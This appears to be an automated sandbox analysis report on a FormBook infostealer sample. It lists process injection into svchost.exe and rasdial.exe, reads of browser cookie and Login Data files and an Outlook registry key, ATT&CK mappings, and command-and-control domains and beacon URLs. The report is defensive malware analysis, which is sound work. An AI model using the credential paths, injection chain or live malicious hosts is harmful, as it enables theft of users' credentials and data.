            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\220204-TF1--00.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\rasdial.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\rasdial.exeThread register set: target process: 6780Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\rasdial.exeThread APC queued: target process: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\220204-TF1--00.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2AEE008Jump to behavior
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006D8C93 LogonUserW,0_2_006D8C93
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_00683B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00683B4C
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_00684A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00684A35
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006E4EF5 mouse_event,0_2_006E4EF5
            Source: C:\Users\user\Desktop\220204-TF1--00.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\220204-TF1--00.exe"Jump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006D81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_006D81F7
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006E4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_006E4C03
            Source: 220204-TF1--00.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: 220204-TF1--00.exe, sXIYDUFnJY.exe, 00000005.00000000.1956178018.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000005.00000002.4130232391.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000000.2098893955.0000000000EF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: sXIYDUFnJY.exe, 00000005.00000000.1956178018.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000005.00000002.4130232391.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000000.2098893955.0000000000EF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: sXIYDUFnJY.exe, 00000005.00000000.1956178018.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000005.00000002.4130232391.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000000.2098893955.0000000000EF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: sXIYDUFnJY.exe, 00000005.00000000.1956178018.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000005.00000002.4130232391.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000000.2098893955.0000000000EF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006A886B cpuid 0_2_006A886B
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006B50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_006B50D7
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006C2230 GetUserNameW,0_2_006C2230
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006B418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_006B418A
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_00684AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00684AFE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4130761704.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4130722993.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2032525862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2033124765.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2032793065.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4129571756.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4130486749.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\rasdial.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: 220204-TF1--00.exeBinary or memory string: WIN_81
            Source: 220204-TF1--00.exeBinary or memory string: WIN_XP
            Source: 220204-TF1--00.exeBinary or memory string: WIN_XPe
            Source: 220204-TF1--00.exeBinary or memory string: WIN_VISTA
            Source: 220204-TF1--00.exeBinary or memory string: WIN_7
            Source: 220204-TF1--00.exeBinary or memory string: WIN_8
            Source: 220204-TF1--00.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4130761704.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4130722993.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2032525862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2033124765.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2032793065.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4129571756.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4130486749.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006F6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_006F6596
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006F6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_006F6A5A

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		5
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		5
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		5
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1503946 Sample: 220204-TF1--00.exe Startdate: 04/09/2024 Architecture: WINDOWS Score: 100 28 www.jaxo.xyz 2->28 30 www.weep.site 2->30 32 18 other IPs or domains 2->32 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 4 other signatures 2->50 10 220204-TF1--00.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 sXIYDUFnJY.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 rasdial.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 sXIYDUFnJY.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.jaxo.xyz 66.29.149.180, 49754, 49755, 49756 ADVANTAGECOMUS United States 22->34 36 tadalaturbo.online 192.185.211.122, 49786, 49787, 49788 UNIFIEDLAYER-AS-1US United States 22->36 38 12 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            220204-TF1--00.exe29%ReversingLabsWin32.Trojan.Generic
            220204-TF1--00.exe31%VirustotalBrowse
            220204-TF1--00.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.ayypromo.shop0%VirustotalBrowse
            tadalaturbo.online1%VirustotalBrowse
            fontanerourgente.net0%VirustotalBrowse
            weep.site2%VirustotalBrowse
            www.cannulafactory.top1%VirustotalBrowse
            www.anaidittrich.com0%VirustotalBrowse
            www.jaxo.xyz1%VirustotalBrowse
            www.onlytradez.club2%VirustotalBrowse
            www.88nn.pro0%VirustotalBrowse
            www.xforum.tech1%VirustotalBrowse
            www.taapbit.online2%VirustotalBrowse
            32wxd.top1%VirustotalBrowse
            www.jiyitf.top1%VirustotalBrowse
            www.weep.site1%VirustotalBrowse
            www.fontanerourgente.net0%VirustotalBrowse
            www.32wxd.top1%VirustotalBrowse
            www.tadalaturbo.online1%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://api.w.org/0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.10%Avira URL Cloudsafe
            http://www.tadalaturbo.online/7o3y/?gTSpc=Khb8pT&56gD=34bWgTnU4AX1gKZq+j0JMo89G/eR8V4xUDpx7/bRsS0fRbM850xuSZ+vkJ4N+S3djb8r5M9tcI2Ggb3yyq8UxrbVXfSA+Cuoh4JbcMUl7SslS3/OMRxqtpA=0%Avira URL Cloudsafe
            http://www.anaidittrich.com/qpwk/0%Avira URL Cloudsafe
            http://www.88nn.pro/l4rw/?56gD=ZXNQqBP58JXIf3luRKwQutCZ8KZdKGRl9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj5OwULwtMZgZPw4PUiP5SYTwADLBcTbBMjV4=&gTSpc=Khb8pT0%Avira URL Cloudsafe
            https://mgmasistencia.com/acerca-de/0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.40%VirustotalBrowse
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.40%Avira URL Cloudsafe
            https://mgmasistencia.com/0%Avira URL Cloudsafe
            https://mgmasistencia.com/0%VirustotalBrowse
            https://mgmasistencia.com/acerca-de/0%VirustotalBrowse
            http://anaidittrich.com/qpwk/?56gD=Pn8OF1j/flre3VebOMg2UbcWr5CJafCXadgaNymjhjlyVvhoWwCe/sZUerDBeXD1/0%Avira URL Cloudsafe
            https://tilda.cc0%Avira URL Cloudsafe
            http://www.cannulafactory.top/l90v/0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.40%Avira URL Cloudsafe
            http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=0%Avira URL Cloudsafe
            https://twitter.com/wordpress0%Avira URL Cloudsafe
            https://mgmasistencia.com/blog/0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.10%VirustotalBrowse
            http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=0%VirustotalBrowse
            http://www.cannulafactory.top/l90v/1%VirustotalBrowse
            http://www.ayypromo.shop/rgqx/0%Avira URL Cloudsafe
            https://es.wordpress.org/0%Avira URL Cloudsafe
            http://www.xforum.tech/647x/0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.40%VirustotalBrowse
            https://mgmasistencia.com/blog/0%VirustotalBrowse
            https://mgmasistencia.com/2021/08/30/hola-mundo/0%Avira URL Cloudsafe
            http://www.weep.site/v1m8/?56gD=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&gTSpc=Khb8pT100%Avira URL Cloudmalware
            https://twitter.com/wordpress0%VirustotalBrowse
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.40%Avira URL Cloudsafe
            https://tilda.cc1%VirustotalBrowse
            http://nginx.net/0%Avira URL Cloudsafe
            https://es.wordpress.org/0%VirustotalBrowse
            https://mgmasistencia.com/2021/08/30/hola-mundo/0%VirustotalBrowse
            http://www.xforum.tech/647x/2%VirustotalBrowse
            http://www.xforum.tech/647x/?56gD=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&gTSpc=Khb8pT0%Avira URL Cloudsafe
            http://www.onlytradez.club/zctj/0%Avira URL Cloudsafe
            http://www.onlytradez.club/zctj/?56gD=tSuw7IYRRjv+wnLSX6BcwOUAvtHef9BV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEherCeW9gkiaKlQQJDWwurePQCYs04wJT4uh8=&gTSpc=Khb8pT0%Avira URL Cloudsafe
            http://www.32wxd.top/kyiu/0%Avira URL Cloudsafe
            http://www.ayypromo.shop/rgqx/?56gD=k7UoFTYShwNh8X30FXwm38h6K+JkxlagtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXoOzwTrau4xfQqB+I7fBgXd6C+YuuVtNtf8U=&gTSpc=Khb8pT0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.40%Avira URL Cloudsafe
            https://mgmasistencia.com/comments/feed/0%Avira URL Cloudsafe
            https://mgmasistencia.com/wp-json/0%Avira URL Cloudsafe
            http://www.anaidittrich.com/qpwk/?56gD=Pn8OF1j/flre3VebOMg2UbcWr5CJafCXadgaNymjhjlyVvhoWwCe/sZUerDBeXD1/Dp7mYeP8BtJLpf3hF/3n4t4NMFgDvNRYoQEyTx0vs+6FBV4KM09ubA=&gTSpc=Khb8pT0%Avira URL Cloudsafe
            http://www.jiyitf.top/uhl0/?56gD=ncGfyjKG78FJ3RoiM5vIj9c1hRDw+kHAJl3DW65koN/XsollpddV5N2bVVuKdzPyIkh4e3ZVd/UrgbHQf7fI8bXCzTYoePvJD/HBD8ObPaKNbBrKYFELLGg=&gTSpc=Khb8pT0%Avira URL Cloudsafe
            http://www.88nn.pro/l4rw/0%Avira URL Cloudsafe
            http://www.32wxd.top/kyiu/?56gD=XDGtsL25HTw6JP67Ly7M1BrbeTxg63xVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszGMKw0lI8qqbvBzBP6NUCsyvYxAKvE0l8E9k=&gTSpc=Khb8pT0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/uploads/2021/09/fondo-plumber-1000x429-1.jpg0%Avira URL Cloudsafe
            http://www.fontanerourgente.net/t3gh/?56gD=d/YHbjU0lRTRkwDxqDIxsrPGLZyEpz4ER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthesnFC5CTi9Yzd9moJgM9Hp7ieo4nvRaLbJdA=&gTSpc=Khb8pT0%Avira URL Cloudsafe
            http://www.datensicherung.email/gs9g/0%Avira URL Cloudsafe
            http://www.jiyitf.top/uhl0/0%Avira URL Cloudsafe
            https://mgmasistencia.com/contacto/0%Avira URL Cloudsafe
            http://www.jaxo.xyz/f9bc/0%Avira URL Cloudsafe
            https://mgmasistencia.com/feed/0%Avira URL Cloudsafe
            http://www.tadalaturbo.online0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.40%Avira URL Cloudsafe
            http://www.redhat.com/docs/manuals/enterprise/0%Avira URL Cloudsafe
            https://wordpress.org/0%Avira URL Cloudsafe
            http://www.551108k5.shop/0or4/?56gD=Ap9XVhmqGkofKqiWnW9mL5/l5ZSEUCfyrZ4yzU5Yy+i7TWDOWZwNJN7AITR5XrxbOYEdZ4fD4Uqd39DYFcK8F05zK8C70DAcVzFic5Orq8iLvChdOek9rdc=&gTSpc=Khb8pT0%Avira URL Cloudsafe
            http://www.fontanerourgente.net/t3gh/0%Avira URL Cloudsafe
            http://www.tadalaturbo.online/7o3y/0%Avira URL Cloudsafe
            http://www.xforum.tech/647x/?56gD=FnaXBox540%Avira URL Cloudsafe
            https://mgmasistencia.com/2021/08/30/hola-mundo/#comment-10%Avira URL Cloudsafe
            http://www.551108k5.shop/0or4/0%Avira URL Cloudsafe
            https://mgmasistencia.com/xmlrpc.php?rsd0%Avira URL Cloudsafe
            https://www.551108k5.shop/0or4/?56gD=Ap9XVhmqGkofKqiWnW9mL5/l5ZSEUCfyrZ4yzU5Yy0%Avira URL Cloudsafe
